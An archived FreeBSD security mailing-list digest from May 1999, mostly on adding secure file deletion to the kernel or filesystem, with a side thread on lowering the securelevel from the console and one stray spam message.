Smorgrav wrote: > > > > My thoughts are about an option in kernel config file (WIPEINFO?) > > A mount option would be better. > Why mount option? Secure deletion is a feature of fs and impacts files of > this on this fs. All of them. So why use mount option? I took him to mean that you could have a mount optionto disallow it on a particular filesystem. (like nosuid, etc..) - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 16:24:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from narcissus.net (narcissus.net [209.73.230.146]) by hub.freebsd.org (Postfix) with ESMTP id CBA3814DF2 for ; Fri, 21 May 1999 16:24:21 -0700 (PDT) (envelope-from ben@narcissus.net) Received: by narcissus.net (Postfix, from userid 1000) id EE281184; Fri, 21 May 1999 19:15:45 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by narcissus.net (Postfix) with SMTP id DFD56183; Fri, 21 May 1999 19:15:45 -0400 (EDT) Date: Fri, 21 May 1999 19:15:45 -0400 (EDT) From: Snob Art Genre To: Avalon Books Cc: Joel Maslak , security@FreeBSD.ORG Subject: Re: Secure Deletion In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 20 May 1999, Avalon Books wrote: > Actually, I've done this already. At the moment, its a simple > stand-alone program (I originally wrote during my DOS days, years ago), > but I've been toying with the idea of adding the method in as an option > for 'rm'. No need to tie up the kernel with this sort of thing. Won't your program have to keep going into the kernel to fsync() anyway? Ben @narcissus.net -- finally To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 16:34:50 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.eurochannel.de (unknown [195.88.158.130]) by hub.freebsd.org (Postfix) with ESMTP id C870B15024 for ; Fri, 21 May 1999 16:34:44 -0700 (PDT) (envelope-from art@eurochannel.de) Received: by mail.eurochannel.de with MERCUR-SMTP/POP3-Server (v2.10) for at Thu, 20 May 99 17:21:02 +0200 From: art@eurochannel.de To: art@eurochannel.de Subject: Data Updating Request Date: Thu, 20 May 99 17:21:02 +0200 Message-Id: <990520172102728300@mail.eurochannel.de> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear Sir or Madam, The wwwARTchannel is a system dedicated to cover the Antiques, Architecture, Crafts, Dance, Design, Fashion, Film & Video, Fine Art, Literature, Multimedia, Music, Photography, Show Biz, Television and Theatre communities. Besides its own database it offers a unified access to over 500 different international and national search engines and more than 1.200 directories and resource pages. In order to be able to offer accurate information about you and your Site for your own benefit we suggest you to re-check and to update your URL at http://www.logisearch.net/art Regards, wwwARTchannel Information desk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 18: 7: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from theverge.com (CDR16-24.accesscable.net [24.138.16.24]) by hub.freebsd.org (Postfix) with SMTP id ACC2014CA6 for ; Fri, 21 May 1999 18:06:57 -0700 (PDT) (envelope-from charlesiii@theverge.com) Received: (qmail 31994 invoked from network); 22 May 1999 01:03:27 -0000 Received: from unknown (HELO theverge.com) (24.138.16.23) by 24.138.16.23 with SMTP; 22 May 1999 01:03:27 -0000 Date: Fri, 21 May 1999 22:03:27 -0300 (ADT) From: Charles To: Snob Art Genre Cc: Patrick Bihan-Faou , Darren Reed , Gregory Sutter , wes@softweyr.com, imp@harmony.village.org, ilmar@ints.ru, posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > If I understand correctly, it's conceivable that someone could break into my > system over the network and get access to the raw disk device, and thereby > read data that have been deleted but not overwritten. That's a good bit > easier than physically breaking in and taking the disk. If your data is that important what are you doing on a network in the first place eh? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 18:19:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from henry.cs.adfa.edu.au (henry.cs.adfa.edu.au [131.236.21.158]) by hub.freebsd.org (Postfix) with ESMTP id C268515000 for ; Fri, 21 May 1999 18:19:26 -0700 (PDT) (envelope-from wkt@henry.cs.adfa.edu.au) Received: (from wkt@localhost) by henry.cs.adfa.edu.au (8.9.2/8.9.1) id LAA15588 for security@FreeBSD.ORG; Sat, 22 May 1999 11:19:25 +1000 (EST) (envelope-from wkt) From: Warren Toomey Message-Id: <199905220119.LAA15588@henry.cs.adfa.edu.au> Subject: Re: Lowering securelevel from console? In-Reply-To: <199905211555.LAA23107@khavrinen.lcs.mit.edu> from Garrett Wollman at "May 21, 1999 11:55:10 am" To: security@FreeBSD.ORG Date: Sat, 22 May 1999 11:19:25 +1000 (EST) Reply-To: wkt@cs.adfa.edu.au X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In a previous article, I asked about the pros/cons of allowing a root process which had the console as its controlling terminal to be able to lower the kernel's securelevel. What I'm suggesting (in pseudo-code) is: static int sysctl_kern_securelvl SYSCTL_HANDLER_ARGS { . . . if (level < securelevel) { if (not superuser or controlling terminal is not console) return (EPERM); } securelevel = level; } Dima Rubin replied: Enabling securelevel changes from the console w/o breaking into the debugger is potentially dangerous. Garrett Wollman replied: A rogue root process could use the debugger to take control of another process (e.g., getty) and force it to disengage security. I think I understand the issue: if someone can break in as root, at the present they cannot lower the securelevel without rebooting the system. With the changes above, they could hijack getty (which runs as root and has the console open) and use it to lower the securelevel. I'd still like to have the ability to temporarily lower the securelevel without having to suffer the delay of a reboot. Is this essentially infeasible, or are there any ways of authenticating the `real' super-user? Ideas of building a one-way hash function and a hashed password into the kernel have just floated into my head, but that seems like overkill :-) Thanks for the feedback! Warren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 19:15:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id A2AE814C3C for ; Fri, 21 May 1999 19:15:22 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA70739; Fri, 21 May 1999 20:14:09 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA00358; Fri, 21 May 1999 20:14:00 -0600 (MDT) Message-Id: <199905220214.UAA00358@harmony.village.org> To: Charles Subject: Re: secure deletion Cc: freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Fri, 21 May 1999 22:03:27 -0300." References: Date: Fri, 21 May 1999 20:14:00 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Charles writes: : If your data is that important what are you doing on a network : in the first place eh? I can see an excellent use for this technology. First, I'd like to see an option that will turn this on for all files in a file system. The reason for doing that is because I'd like to turn it on my /tmp partition so that any temp files are killed dead. Many mail programs/readers/etc will write to /tmp. Most are good enough to open the file and immediately unlink it (however, since it is still open, the data still may wind up on disk). This, btw, is one reason why modifying unlink in libc in insufficient. I know this would be a performance hit, but I do not care. I can also see setting this bit for a directory as well. Since I use mh for my email, when i do an inc, I get lots of files in one directory. When this bit is set in the directory, then when a file is deleted, it is shredded completely. I do not want to have to set bits on all my mail. The mail that I get might contain sensitive information that I do not wish to have disclosed to anybody should my machine be siezed before those disks blocks can be reused. Another reason for placing it into the kernel has been stated before. Namely that if a file grows, then the fragment that was previously in use at the end of the file needs to be shredded. It all depends on what level you want to be paranoid. I can certainly understand the desire for people to run with this feature for a normal, production system. A mail relay system, for example, would be an excellent candidate. That system is potentially exposed to the outside world. With a shredding option in place, it becomes impossible for an intruder to gain access to snippets of email from prior days that were spinning on the disk unallocated. While there is still a lot that an intruder can do on that system, you have a very very very high level of assurance that he/she/it didn't get information that predates the penetration, save what was in the mail queues. Without this, you have no such assurances. While it is true that the intruder can do damage after the penetration, or steal data that flows through the machine after such a penetration, most detection procedures will detect this intrusion. Finally, networks are a way of life for many people. I cannot control what people send me over the network. Most of the sensitive information does come to me encrypted, but I want protection for the stuff that isn't. To assume that just because a machine is on the network it contains no interesting data (or that it can contain no interesting data) is not a valid assumption. The suggestion of removing the machine from the network is unhelpful. Just trying to present a reasonable view about why someone would want to use this feature, and some design parameters that would maximize its usefulness. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 19:18: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 71E4314E64 for ; Fri, 21 May 1999 19:17:57 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id UAA70749; Fri, 21 May 1999 20:16:45 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id UAA00385; Fri, 21 May 1999 20:16:37 -0600 (MDT) Message-Id: <199905220216.UAA00385@harmony.village.org> To: wkt@cs.adfa.edu.au Subject: Re: Lowering securelevel from console? Cc: security@FreeBSD.ORG In-reply-to: Your message of "Sat, 22 May 1999 11:19:25 +1000." <199905220119.LAA15588@henry.cs.adfa.edu.au> References: <199905220119.LAA15588@henry.cs.adfa.edu.au> Date: Fri, 21 May 1999 20:16:37 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199905220119.LAA15588@henry.cs.adfa.edu.au> Warren Toomey writes: : I think I understand the issue: if someone can break in as root, at the : present they cannot lower the securelevel without rebooting the system. That is the design goal. Modulo bugs in device drivers, that is the case. : I'd still like to have the ability to temporarily lower the securelevel : without having to suffer the delay of a reboot. Is this essentially : infeasible, or are there any ways of authenticating the `real' super-user? options DDB in your kernel. However, that assumes that physical posession of the console (or the ability to get to it if it is a serial console) is secure enough. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 20:37:28 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 8E52F14F44 for ; Fri, 21 May 1999 20:37:26 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id UAA29116; Fri, 21 May 1999 20:37:23 -0700 (PDT) Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id UAA13713; Fri, 21 May 1999 20:37:23 -0700 Received: from softweyr.com ([204.68.178.39]) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA04565; Fri, 21 May 99 20:37:16 PDT Message-Id: <3746266A.73D34043@softweyr.com> Date: Fri, 21 May 1999 21:37:14 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en Mime-Version: 1.0 To: Snob Art Genre Cc: freebsd-security@FreeBSD.ORG Subject: Re: secure deletion References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Snob Art Genre wrote: > > So I can see some use for functionality that overwrites files on unlink() > thoroughly enough to prevent further reading by the disk head, even if it > offers no protection against the kind of specialized reading devices that > can be used on a captured hard disk platter. > > I'm not advocating this measure so much as pointing out that there is a > perceptible level of security between what we currently have and > military-grade. I agree, if your security measures cost more than the worth of your data, you're shooting yourself in the foot. But, on the other hand, if you're going to implement a page- or file-overwriting algorithm, you might as well use one that has some chance of success, as opposed to the "pissing in the wind" effort of overwriting them with zeroes. The pattern used in rm -P is a step in the right direction, but alter- nating bits works better than successive generations of all ones then all zeroes. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 23:44:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id A38E6151CB for ; Fri, 21 May 1999 23:44:46 -0700 (PDT) (envelope-from ilmar@ws-ilmar.ints.ru) Received: from ws-ilmar.ints.ru (ws-ilmar.ints.ru [194.67.173.16]) by ints.ru (8.9.2/8.9.2) with ESMTP id KAA16548; Sat, 22 May 1999 10:44:45 +0400 (MSD) Received: from localhost (localhost [127.0.0.1]) by ws-ilmar.ints.ru (8.9.2/8.9.1) with ESMTP id KAA25114; Sat, 22 May 1999 10:44:44 +0400 (MSD) Date: Sat, 22 May 1999 10:44:44 +0400 (MSD) From: "Ilmar S. Habibulin" To: Dag-Erling Smorgrav Cc: posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 21 May 1999, Dag-Erling Smorgrav wrote: > Because a mount option can be changed at runtime, whereas a kernel > option cannot. A mount option would allow you to enable the security > feature on file systems which need it but not on file systems which do > not need it, whereas a kernel option would enable it unconditionally > on all file systems. And what about it? I just don't understand why this option must be fs-specific. If file have no flag, it would be deleted in ordinary way. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 21 23:54:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id 6F71D15387 for ; Fri, 21 May 1999 23:54:09 -0700 (PDT) (envelope-from ilmar@ws-ilmar.ints.ru) Received: from ws-ilmar.ints.ru (ws-ilmar.ints.ru [194.67.173.16]) by ints.ru (8.9.2/8.9.2) with ESMTP id KAA16847; Sat, 22 May 1999 10:54:08 +0400 (MSD) Received: from localhost (localhost [127.0.0.1]) by ws-ilmar.ints.ru (8.9.2/8.9.1) with ESMTP id KAA25382; Sat, 22 May 1999 10:54:08 +0400 (MSD) Date: Sat, 22 May 1999 10:54:08 +0400 (MSD) From: "Ilmar S. Habibulin" To: James Wyatt Cc: posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 21 May 1999, James Wyatt wrote: > > > > My thoughts are about an option in kernel config file (WIPEINFO?) > > > A mount option would be better. > > Why mount option? Secure deletion is a feature of fs and impacts files of > > this on this fs. All of them. So why use mount option? > > I took him to mean that you could have a mount optionto disallow it on a > particular filesystem. (like nosuid, etc..) - Jy@ Ok, i undestand. And about kernel config option to enable wipe feature - we can make this feature be controlable through sysctl interface. Disadvantage - some permanent code (maybe unused at all). To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 22 0: 2:36 1999 Delivered-To: freebsd-security@freebsd.org Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.26.10.9]) by hub.freebsd.org (Postfix) with ESMTP id C39DC15214 for ; Sat, 22 May 1999 00:02:31 -0700 (PDT) (envelope-from bde@godzilla.zeta.org.au) Received: (from bde@localhost) by godzilla.zeta.org.au (8.8.7/8.8.7) id RAA05553; Sat, 22 May 1999 17:02:17 +1000 Date: Sat, 22 May 1999 17:02:17 +1000 From: Bruce Evans Message-Id: <199905220702.RAA05553@godzilla.zeta.org.au> To: des@flood.ping.uio.no, patrick@mindstep.com Subject: Re: secure deletion Cc: darrenr@reed.wattle.id.au, freebsd-security@FreeBSD.ORG, gsutter@pobox.com, ilmar@ints.ru, imp@harmony.village.org, posix1e@cyrus.watson.org, wes@softweyr.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >> I agree with that last statement. An implementation on FreeBSD probably does >> not need to write multiple times to the disk. > >Wouldn't work, anyway, unless you disable write caching (not just on >the disk, but in the disk driver as well - no soft updates!). >Otherwise, all passes but the last will be ignored, unless you wipe a >really big file (too big to fit in cache). man fsync Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 22 1:38:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 40E4D14BF1 for ; Sat, 22 May 1999 01:38:19 -0700 (PDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.9.3/8.9.3) with ESMTP id CAA71699; Sat, 22 May 1999 02:37:04 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id CAA02030; Sat, 22 May 1999 02:36:59 -0600 (MDT) Message-Id: <199905220836.CAA02030@harmony.village.org> To: "Ilmar S. Habibulin" Subject: Re: secure deletion Cc: Dag-Erling Smorgrav , posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Sat, 22 May 1999 10:44:44 +0400." References: Date: Sat, 22 May 1999 02:36:59 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message "Ilmar S. Habibulin" writes: : On 21 May 1999, Dag-Erling Smorgrav wrote: : : > Because a mount option can be changed at runtime, whereas a kernel : > option cannot. A mount option would allow you to enable the security : > feature on file systems which need it but not on file systems which do : > not need it, whereas a kernel option would enable it unconditionally : > on all file systems. : And what about it? I just don't understand why this option must be : fs-specific. If file have no flag, it would be deleted in ordinary way. I think that what people are saying, if I understand them correctly, is that it would be desirable if an entire file system could be told to do the shredding delete. This would make it useful for a filesystem mounted on /tmp, for example. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 22 2:51:25 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id ACA1114C1E for ; Sat, 22 May 1999 02:51:15 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id LAA84596; Sat, 22 May 1999 11:50:01 +0200 (CEST) (envelope-from des) To: Bruce Evans Cc: patrick@mindstep.com, darrenr@reed.wattle.id.au, freebsd-security@FreeBSD.ORG, gsutter@pobox.com, ilmar@ints.ru, imp@harmony.village.org, posix1e@cyrus.watson.org, wes@softweyr.com Subject: Re: secure deletion References: <199905220702.RAA05553@godzilla.zeta.org.au> From: Dag-Erling Smorgrav Date: 22 May 1999 11:50:00 +0200 In-Reply-To: Bruce Evans's message of "Sat, 22 May 1999 17:02:17 +1000" Message-ID: Lines: 12 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Bruce Evans writes: > > Wouldn't work, anyway, unless you disable write caching (not just on > > the disk, but in the disk driver as well - no soft updates!). > > Otherwise, all passes but the last will be ignored, unless you wipe a > > really big file (too big to fit in cache). > man fsync Doh. Where is my head? Oh, I left it at the bar last night... DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 22 4:23:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from ints.ru (ints.ru [194.67.173.1]) by hub.freebsd.org (Postfix) with ESMTP id 601ED14C96 for ; Sat, 22 May 1999 04:23:10 -0700 (PDT) (envelope-from ilmar@ws-ilmar.ints.ru) Received: from ws-ilmar.ints.ru (ws-ilmar.ints.ru [194.67.173.16]) by ints.ru (8.9.2/8.9.2) with ESMTP id PAA25616; Sat, 22 May 1999 15:23:09 +0400 (MSD) Received: from localhost (localhost [127.0.0.1]) by ws-ilmar.ints.ru (8.9.2/8.9.1) with ESMTP id PAA32769; Sat, 22 May 1999 15:23:08 +0400 (MSD) Date: Sat, 22 May 1999 15:23:08 +0400 (MSD) From: "Ilmar S. Habibulin" To: Warner Losh Cc: posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion In-Reply-To: <199905220836.CAA02030@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 22 May 1999, Warner Losh wrote: > I think that what people are saying, if I understand them correctly, > is that it would be desirable if an entire file system could be told > to do the shredding delete. This would make it useful for a > filesystem mounted on /tmp, for example. You mean _all_ files on that filesystem? Maybe use inheritance - setting bit on directory will automatically wipe all deleting files on it? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 22 6:58:29 1999 Delivered-To: freebsd-security@freebsd.org Received: from mx01.iafrica.com.na (mx01.iafrica.com.na [196.31.227.173]) by hub.freebsd.org (Postfix) with ESMTP id DC34F151F5 for ; Sat, 22 May 1999 06:58:17 -0700 (PDT) (envelope-from tim@iafrica.com.na) Received: from dup85-whk.iafrica.com.na ([196.20.4.154] helo=aptiva) by mx01.iafrica.com.na with smtp (Exim 2.11 #1) id 10lCHW-000GpI-00; Sat, 22 May 1999 14:57:43 +0100 Message-ID: <3746B829.E60@iafrica.com.na> Date: Sat, 22 May 1999 15:59:05 +0200 From: Tim Priebe Reply-To: tim@iafrica.com.na X-Mailer: Mozilla 3.01 (Win95; I) MIME-Version: 1.0 To: wkt@cs.adfa.edu.au Cc: security@freebsd.org Subject: Re: Lowering securelevel from console? References: <199905210635.QAA10497@henry.cs.adfa.edu.au> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warren Toomey wrote: > > Hi all, > I'm sure this has been discussed before, I've hit the list browse > web engine with no good results, so... > > I think that being able to lower the securelevel as root from the console > would be a good idea, rather than having to go to single-user mode to make > changes as required. > > I know the current code in kern_mib.c doesn't do this. I'm expecting > comments back saying that it's not a good idea, you're still net connected. > Assume I've ifconfig'd all interfaces down :-) > > Now, are there any other reasons why lowering securelevel as root from > the console (and no net connectivity) would be a BAD thing? If the system is multi-user with terminals or modems attached, you have just removed the security, with the possibility of having users connected. Further, if someone knows you lower your secure level without changing to single user mode, they could set a program running that waits for the secure level to change, and then does its damage. For the systems I run in secure mode, I want to know that it only comes out of secure mode, when switched to single user mode. Tim. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 22 7:18:39 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id 91F1614BF4 for ; Sat, 22 May 1999 07:18:36 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id QAA20476; Sat, 22 May 1999 16:18:31 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id QAA04017; Sat, 22 May 1999 16:18:26 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: "Ilmar S. Habibulin" Cc: posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion In-reply-to: Your message of "Wed, 19 May 1999 16:01:45 +0400." Date: Sat, 22 May 1999 16:18:26 +0200 Message-ID: <4015.927382706@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message , "Ilmar S . Habibulin" writes: > >May be it's an freebsd-fs@ question, but i think that it belings here to. >I heard that some linux fs (maybe extfs2?) have some secure deletion flag, >which being set on inode(file or dir) cause content of this file to be >wiped before deletion, so even if somebody manage to restore file, its >content would be unusable. I think, that it is nice feature, and i would >like to see it in freebsd. What would you say? If somebody decides to implement this in the kernel, please take a look at the VOP_FREEBLKS() interface which is where/how it should be done, if at all. -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 22 8:11:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id 7E64914D93 for ; Sat, 22 May 1999 08:11:39 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id RAA11887; Sat, 22 May 1999 17:11:38 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id RAA00583; Sat, 22 May 1999 17:11:38 +0200 (MET DST) Date: Sat, 22 May 1999 17:11:38 +0200 From: Eivind Eklund To: Thomas Valentino Crimi Cc: brooks@one-eyed-alien.net, Dag-Erling Smorgrav , "Ilmar S. Habibulin" , posix1e@cyrus.watson.org, freebsd-security@FreeBSD.ORG Subject: Re: secure deletion Message-ID: <19990522171138.K85583@bitbox.follo.net> References: <19990521201043.I85583@bitbox.follo.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: ; from Thomas Valentino Crimi on Fri, May 21, 1999 at 03:34:56PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, May 21, 1999 at 03:34:56PM -0400, Thomas Valentino Crimi wrote: > Excerpts from mail: 21-May-99 Re: secure deletion by Eivind Eklund@FreeBSD.OR > > Either tunefs or chflags - it would be relatively expensive, so if you > > only need it for some data, it is probably better to have more > > fine-grained control than per-FS. > > Might I also suggest a 'normal' user option for one particular file to > be securely wiped? It is not possibly to securely delete a file after data has been written to it unless the wish to do so has been indicated to the kernel from the start of the file's life time. We do de-fragmentation while the FS is running (or at least that's what I understood the dorealloc code to do). Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 22 9: 1:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from xylan.com (postal.xylan.com [208.8.0.248]) by hub.freebsd.org (Postfix) with ESMTP id 9556F14C2F for ; Sat, 22 May 1999 09:01:49 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from mailhub.xylan.com by xylan.com (8.8.7/SMI-SVR4 (xylan-mgw 2.2 [OUT])) id JAA29860; Sat, 22 May 1999 09:01:14 -0700 (PDT) Received: from omni.xylan.com by mailhub.xylan.com (SMI-8.6/SMI-SVR4 (mailhub 2.1 [HUB])) id JAA26984; Sat, 22 May 1999 09:01:14 -0700 Received: from softweyr.com ([204.68.178.39]) by omni.xylan.com (4.1/SMI-4.1 (xylan engr [SPOOL])) id AA03396; Sat, 22 May 99 09:01:10 PDT Message-Id: <3746D4C6.4A284FE0@softweyr.com> Date: Sat, 22 May 1999 10:01:10 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en Mime-Version: 1.0 To: Warner Losh Cc: freebsd-security@FreeBSD.ORG Subject: Re: secure deletion References: <199905220836.CAA02030@harmony.village.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Warner Losh wrote: > > In message "Ilmar S. Habibulin" writes: > : On 21 May 1999, Dag-Erling Smorgrav wrote: > : > : > Because a mount option can be changed at runtime, whereas a kernel > : > option cannot. A mount option would allow you to enable the security > : > feature on file systems which need it but not on file systems which do > : > not need it, whereas a kernel option would enable it unconditionally > : > on all file systems. > : And what about it? I just don't understand why this option must be > : fs-specific. If file have no flag, it would be deleted in ordinary way. > > I think that what people are saying, if I understand them correctly, > is that it would be desirable if an entire file system could be told > to do the shredding delete. This would make it useful for a > filesystem mounted on /tmp, for example. If you're really concerned about security, you'll want this on enabled on swap spaces, too, just in case sensitive data got swapped to disk. You can't avoid having it on disk while the page is active, but certainly want it securely erased when the page is no longer in use. -- "Where am I, and what am I doing 